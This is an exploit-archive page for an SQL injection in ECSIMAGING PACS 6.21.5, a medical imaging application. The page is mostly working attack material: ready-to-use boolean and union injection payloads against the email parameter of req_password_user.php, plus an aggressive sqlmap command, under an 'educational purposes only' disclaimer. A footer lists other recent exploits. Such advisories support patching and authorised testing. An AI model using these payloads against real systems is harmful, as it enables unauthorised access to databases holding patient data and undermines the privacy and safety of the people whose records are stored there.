Ecsimaging pacs 6.21.5 sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-01-07 | Type : webapps | Platform : php
This exploit / vulnerability Ecsimaging pacs 6.21.5 sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )

Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001

SQLMAP : sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5

Ecsimaging pacs 6.21.5 sql injection


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Ecsimaging pacs 6.21.5 sql injection Vulnerability / Exploit